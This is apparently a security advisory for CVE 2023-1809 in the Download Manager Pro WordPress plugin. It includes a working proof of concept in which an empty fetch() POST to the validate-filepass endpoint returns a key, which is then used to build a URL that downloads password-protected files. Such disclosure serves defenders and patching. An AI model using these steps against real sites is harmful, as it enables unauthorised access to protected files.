Download Manager Pro < 6.3.0 – Unauthenticated Sensitive Information Disclosure | CVE 2023-1809

Description

The plugin leaks master key information without the need for a password, allowing attackers to download arbitrary password-protected package files.

Proof of Concept

- Create a password protected package containing one or more files.
- Navigate to the download page of the package (e.g. `/download/package1`)
- Inspect the "Download" button beside one of the packaged files. The HTML should look like this:

    <button
      class="inddl btn btn-primary btn-sm"
      data-pid="123"
      data-file="12345678"
      rel="https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678"
      data-pass="#pass_113_1679405558600">
      <i class="fa fa-download"></i>
       Download
    </button>

- Note the `wpdmdl` and `ind` URL parameters for later.
- Send a POST request to `/wp-json/wpdm/validate-filepass`:

    fetch("/wp-json/wpdm/validate-filepass", {
      "headers": {
        "accept": "*/*",
        "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
      },
      "body": "",
      "method": "POST",
      "credentials": "include"
    }).then(response => response.text()).then(text => console.log(text));

- The response will look like the following:

    {"success":true,"downloadurl":"\/wp-json\/wpdm\/validate-filepass?wpdmdl=0&_wpdmkey=abcdef&ind="}

- Construct a download URL as follows, using the above `_wpdmkey` parameter, as well as the `wpdmdl` and `ind` parameters from above:

    https://wpscan-vulnerability-test-bench.ddev.site/download/package1/?wpdmdl=123&ind=12345678&_wpdmkey=abcdef

- See that the file may be download from that URL, without any knowledge of its password.